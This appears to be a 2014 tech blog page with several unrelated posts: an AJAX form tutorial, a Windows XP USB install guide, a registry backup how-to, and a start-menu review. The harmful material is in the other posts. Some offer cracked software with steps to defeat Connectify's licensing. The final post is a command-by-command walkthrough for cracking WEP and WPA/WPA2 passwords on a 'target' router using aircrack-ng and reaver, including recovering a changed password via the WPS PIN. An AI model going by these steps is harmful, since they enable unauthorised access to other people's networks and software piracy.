Monday, July 28, 2014

Submit a form without refreshing page using ajax and PHP

This is very simple function.Ajax is used to submit a form without refreshing page.

Live Demo   Download Script

 Step 1:

    Need library function.Just copy and paste the below library file.
    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>


jQuery Code

<script type="text/javascript" >
    $(function() {
        $(".submit").click(function() {
        var name = $("#name").val();
        var email = $("#email").val();
        var reg = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/;
      
        var dataString = 'name='+ name + '&email=' + email;
       
        if(name=='')
        {
            $('.success').fadeOut(200).hide();
            $('.error').fadeOut(200).show().html('<div class="notice" align="left">Please enter a name</div>');;
            $("#name").focus();
        }
        else if(email=='')
        {
            $('.success').fadeOut(200).hide();
            $('.error').fadeOut(200).show().html('<div class="notice" align="left">Please enter a email address</div>');;
            $("#email").focus();
        }
        else if(reg.test(email) == false)
          {
                $('.success').fadeOut(200).hide();
                $('.error').fadeOut(200).show().html('<div class="notice" align="left">Please enter a valid email address</div>');;
                $("#email").focus();
          }
        else
        {
            $.ajax({
                type: "POST",
                url: "mail.php",
                data: dataString,
                success: function(){
                $('.success').fadeIn(200).show();
                $('.error').fadeOut(200).hide();
            }
            });
        }
        return false;
        });
    });
    </script>

HTML form

<form method="post" name="form">
  <p>Name:
    <input id="name" name="name" type="text" />
  </p>
  <p>Email:
    <input id="email" name="email" type="email" required />
  </p>
  <span class="error" style="display:none; color:#FF0000"> Please enter valid data</span> <span class="success" style="display:none;color:#33CC66"> Thank You.Your mail has been sent successfully.</span>
  <p>
    <input type="submit" name="submit" value="Submit" class="submit"/>
  </p>
</form>
Please share your comments and feedback.Thanks.Please subscribe my updates via email.

Friday, July 25, 2014

Windows 7: problem: 3.2GB RAM usable out of 8GB!!

I Have Windows 7 Professional x64 with 8GB installed (2x4GB DDR3 Kingston). I installed the windows with the 8GB from the start. Windows recognizes 8GB installed but only 3.2GB usable.

In the Resource Monitor 4.9GB are "Hardware Reserved". I have a nVidia GTS450 graphic card, but the nvidia control Panel "System Information" shows that it uses 1GB from the card framebuffer and 1.4 GB shared system memory.

The M/B supports 8GB

I didn't find any memory remap option on the BIOS, but it clearly detects 8GB (the BIOS).

I tried checking (and unchecking) the "Maximum memory" option in the msconfig > Advanced Options. When i chek it it automatically appears "8192" (8GB?), but when i reboot and check again it appears "0" (which means auto??). Nothing happens at all.

Further PC specifications:

MSI H55M-E21 M/B (socket 1156)
Intel i5-760
nVidia GTS450
2x4GB DDR3 Kingston (PC3 - 10600 CL9 240 - Pin DIMM)

See the images below

Any Ideas?

P.S: please dont tell me to check if my OS is 64 bit. It is

Download this tool?



Sunday, July 20, 2014

Connectify Hotspot Professional v4.2.0.26088 Cracked


Connectify Hotspot Professional v4.2.0.26088 Cracked-DOA.NEC
Connectify Hotspot is an easy to use software router for Windows computers that utilizes your PCs built in Wi-Fi card to wirelessly share any available Internet connection with friends, co-workers, and mobile devices.

After instalation you must apply the crack
1. Run ConnectifyExit.cmd as Administrator
2. Go into "C:ProgramFilesConnectify" and replace BuildProps.dll with the one
included in this package
3. Go into "C:ProgramFilesConnectifyplugins" and remove the 'dispatch' dir
4. Run ConnectifyStart.bat as Administrator
5. Start Connectify and use registration provided by DOA
Enjoy!!

Download

Avast Internet Security 2014 9.0.2011.263 Final+Keyfile

Version: 9.0.2011.263
Type: PC, Mac & Other
Language of interface: EN
Supported OS: Windows
Developer: Avast
Crack: Available
Description: avast Internet Security 9.0.2011.263 - Is a well-known antivirus pretty high. The developers of anti-virus put into it all the knowledge about fighting viruses in order to create one of the best antivirus. This anti-virus program has combined the all the advanced technology and techniques to get the highest level of computer protection. This product is perfect for all the operating systems Windows. Avast carefully checks for viruses memory, files, email, and other than that, he is even able to cope with a macro virus.

Features:-

Feel better with our best protection:

avast! Internet Security provides complete antivirus, anti-spyware, antispam, and firewall protection, complemented by avast! SafeZone and new hybrid cloud technologies, for best protection against viruses, spyware, and other types of malware in 2012.

Shop and bank online without worry:

SafeZone creates a private and isolated virtual window on your desktop for safely making your sensitive financial transactions when shopping or banking online.

Surf and socialize without annoyance:

Sandbox lets you surf the web and run programs virtually (outside your PC), and Web, IM, and P2P shields ensure your safety on social networks (Facebook, Twitter, etc.), IM chats (Skype, ICQ, etc.), or file-sharing sites.

Benefit from real-time protection:

Hybrid cloud technology streams your virus database updates to your PC in real-time, so your avast! software has all virus definitions as soon as they are known to our Virus Lab.

Keep your ID yours and yours alone:

The built-in silent firewall blocks hackers and other unauthorized entry attempts to steal sensitive personal data from your PC. Phishing attacks are prevented via built-in anti-spam.

1.Run setup file & install it.

2.Activate program using key file
System requirements:
Size: 121 MB

 Download


Friday, July 18, 2014

How to setup Windows XP from USB drive?


Step1: Prepping BartPE:
First we’ll prep the USB drive we’ll be using for booting. This is by far the largest step in the process, though it shouldn’t be difficult for anyone to follow. It requires a functional Windows system.
  1. Download BartPE builder from http://www.nu2.nu/pebuilder/
  2. Install BartPE. We’ll be assuming that you install to C:\pebuilder.
  3. Start PE Builder from the Start Menu. Point "Source:" to the location of your Windows XP setup files containing SP3.
  4. Make sure the "Output:" is set to "BartPE". 
  5. Set "Media output" as "Create ISO image" and filename as "c:\pebuilder\pebuilder.iso".
  6. Hit "Build". 
  7. When it's done building, image file "c:\pebuilder\pebuilder.iso" should be created properly.

Step2: Create XP Bootable USB Drive:
  1. Start PowerISO (v4.8 or newer version, download )here.
  2. Insert the USB drive you intend to boot from.
  3. Choose the menu "Tools > Create Bootable USB Drive". The "Create Bootable USB Drive" dialog will popup. If you are using Windows Vista or Windows 7 operating system, you need confirm the UAC dialog to continue.
  4. In "Create Bootable USB Drive" dialog, click "..." button to open the iso file "c:\pebuilder\pebuilder.iso".
  5. Select the correct USB drive from the "Destination USB Drive" list if multiple USB drives are connected to the computer.
  6. Choose the proper writing method. "USB-HDD" is recommended.
  7. Click "Start" button to start creating bootable USB drive.
  8. When it's done, copy the Windows XP setup files to the USB drive. Please note that you'll only need the i386 folder. 
If no errors occurred in the above process, you should now be all set to setup Windows xp from USB drive!

Step 3: Configuring the BIOS:
You should now reboot and go into the BIOS configuration to boot from USB. Instructions for doing so wildly from system to system, but generally entail the following:
  1. Reboot the system.
  2. While booting (before Windows starts loading), get into the BIOS configuration screen by hitting something like F1, F2, Delete or Escape. Hotkey instructions are generally provided on the screen.
  3. Go to the section that contains your boot devices.
  4. With your USB drive plugged in, the USB drive should be listed. If it isn’t, your system might not support booting from USB. Assuming that it is supported (as is the case with virtually all modern hardware), promote your USB drive to the primary boot device.
  5. Exit from the BIOS configuration, saving all changes.
If you’re completely new to BIOS configuration, BIOSfor Beginners over at Tom’s Hardware might be a good primer. Be aware though, that you can seriously screw up your system by providing incorrect settings!

Step 4: Booting into BartPE:
Assuming that you properly configured your BIOS and your USB drive supports booting,  BartPE should now load. Depending on the speed of your USB drive, this may take a while.
If it isn’t working, then double-check the following before making a scene:
  • Is your BIOS properly configured for booting from the USB device? (Is the USB device listed and does it have top priority?)
  • Have you correctly prepared the USB drive in step one? (Restart the procedure.)
  • Does your USB drive properly support being booted from? (Try another one!)
 
Step 5: Prepping the Hard Disk:
You need to make sure that your hard drive is partitioned and formatted properly. Especially if you've had Linux or some other operating system on it, you'll need to repartition and format it. BartPE contains DiskPart for disk partitioning and A43 File Manager to format your drive.
If you are sure that your hard drive is set up properly (i.e. it has only run Windows, it contains a valid FAT or NTFS partition) then you can safe yourself the hassle and skip this step.
To repartition (This procedure will destroy any data on the hard drive):
  1. From the Go menu, navigate to DiskPart.
  2. Enter the commands needed to repartition your drive. For example, try the following: select disk 0 (select the first disk), clean (purges the entire drive, essentially resetting it), create partition primary (creates a single partition from the entire disk), assign (assign the partition a drive letter), exit (quits DiskPart).
To format (This procedure will destroy any data on the hard drive):
  1. From the Go menu, navigate to the A43 File Manager.
  2. Right-click on the target drive (e.g. C:) and click Format. Should be self-explanatory.

Step 6: Launching Windows XP Setup from USB drive:
With your drive all ready, you can now launch the Windows XP setup with a few custom parameters. Let's assume that the files are available at X:\i386.
Plugging in a device now won’t work. Remember that all USB devices will need to be plugged in right from the start while using BartPE.
Run the following command:
  1. Run X:\i386\winnt32.exe /syspart:C: /tempdrive:C: /makelocalsource. Replace C: with the drive you want to install Windows to.
  2. Proceed with the installation. When asked to convert the installation volume to NTFS, answer No. The setup program incorrectly believes that your USB drive (which is formatted as FAT) needs conversion.
The setup program will then silently close, which might make you think that something went wrong. Don't worry though.

Step 7: Continue Windows XP Setup from Hard disk:
  1. Reboot your system.
  2. Unplug USB drive during post stage.
  3. Change your BIOS settings back to boot from hard disk again as needed.
  4. You can now continue to finish setting up Windows XP.
 
Note: The above guide works with Windows XP only. For Windows 7 / Windows 8 / Windows Vista please refer to another guide at http://www.poweriso.com/tutorials/how-to-make-win7-bootable-usb-drive.htm .

Friday, July 11, 2014

New major update ViStart 8.1 the ultimate start menu for windows 8

Vistart the free start menu for Windows 8 and older Windows versions got a “double” major update with lots of new and improved features. Vistart has of course all the features that you expect from a start menu and then some more. One of the best features in comparison of some paid alternatives like Start8 from Stardock, is of course that Vistart 8 is completely free while having more features and functionality.
read more of the new and improved features of Vistart 8.1:

Skins

The most eye catching is of course the complete renewed skin manager for Vistart that comes with already 3 pre installed skins and 4 start button images. You can change the Vistart skins now in a eye blink without even have to restart Vistart or Windows. This is also the case for the start buttons you can change them independently from the skins so you can mix start buttons and skins to select your look of choice for Vistart. On our website you can download 25 additional free skins and 20 buttons that are now even more easy to install for everyone . Also you can use your own .png images to enhance your start menu button or create your own skin. We can proudly say that Vistart is the most customizable start menu available on the net.

 

Completely new control panel

Vistart has a completely new control panel for all options and preferences that is easily accessible from various places within the Start menu. Now you can adjust all settings/options/preferences in one place and we added a lot of new options and settings.


 

Metro Control and Access

Within the control panel you can control how metro is behaving or even disable certain metro features. Par example you can set Windows 8 to skip the metro and boot directly to the windows 8 desktop. You also can Disable “hot” corners, charms bar, etc so you even can make Windows 8 function like Windows 7.
To have easy access from the desktop to the “metro interface” we added two extra shortcuts in the start menu are to easily access the Windows 8 Metro start screen or switch to the Windows 8 Apps window from Vistart.

Search

Vistart had already a building search that is even faster than the original build in Microsoft search, we even improved on that to enhance the search results even further especially for Windows 8 app search.

Download


How to Backup and Restore Registry In Windows 7, XP and Vista

If you are a geek or tweak-lover obviously you may have touched the Windows Registry. Since registry values are acting a main role in Windows we should be very careful while handling those values. If you done something wrong, its really difficult to revert back to the old settings.

Backing Up Registry In Windows


STEP 1 : Go to Run. (Windows Key + R).
STEP 2 : Type regedit and hit enter. The Registry Editor Window opens.




STEP 3 : Go to File > Export.



STEP 4 : Select a secure location for the exported backup file.  Give a name for it  and hit Save.


Restoring Registry In Windows

STEP 1 : Go to Run  (Windows Key + R).
STEP 2 : Type regedit and hit enter. The Registry Editor Window opens.
STEP 3 : Go to File > Import.


 STEP 4 : Browse and locate the backed up registry file and Press Enter.



Subscript to my blog...

Wednesday, July 9, 2014

Hack wireless work 100%


Today i'm going to show you how to Crack WEP and WPA/WPA2-PSK passwords!

I'm using BackTrack 5 r3 because the tools that i'm going to use come already installed, but you can use any other Linux Distribution!

WEP Cracking

What is Aircrack-NG?

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.

How do i use this tool?

Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.

These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.

Let's Begin.

Open up a terminal and type:


Quote:airmon-ng


Spoiler (Click to View)


This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.

Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1
Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0

After that, type:
Quote:airodump-ng mon0





When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.

Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.






Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0



You should know start recieving DATA. 

To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0
After it says it was successfull, type:

Quote:aireplay-ng -3 -b [BSSID] mon0




After a some secondsthis should appear:
 



When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.cap
Now, wait for some minutes and it should give you the PASSWORD!

The password is:
Quote:EF855844B288E4BB1BA9ADF14D






PA2-PSK Cracking

Reaver

What is reaver?

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

How do i use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any Dictionary files!

First, type:
Quote:airmon-ng
As said earlier, this shows you, your wireless card name.

I'll use wlan0

We need to set it the wireless card on monitor mode, so type:
Quote:airmon-ng start wlan0
After that, type:
Quote:airodump-ng mon0




Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel

To see the AP's that are vulnerable to WPS attacks, type:
Quote:wash -i mon0
If the target AP is vulnerable, it should say:
Quote:WPS Locked: No









Now, to start the attack, type:
Quote:reaver -i mon0 -b [BSSID] -vv





Now, you'll need to wait around 2-10 hours.

If the AP is limiting you with a message saying:
Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
AND

If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:
Quote:reaver --help
This will show you the help menu, you can start playing with the options that you have.

I usually add the: -c -S -L
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv
This one works great for me, so keep playing with the options untill it works!

When it reaches 100% it should give you some lines, the password is the one after:
Quote:WPS PSK: 'PASSWORD HERE'
And here it is!

You should also, remember the PIN.
Quote:WPS PIN: PIN HERE
Now, let's say for some reason, the router's owner changed the password for his WiFi.

Since you already have the pin, type:
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
And it should give you the password in a matter of seconds!


 Thank you!! Let us know you are working...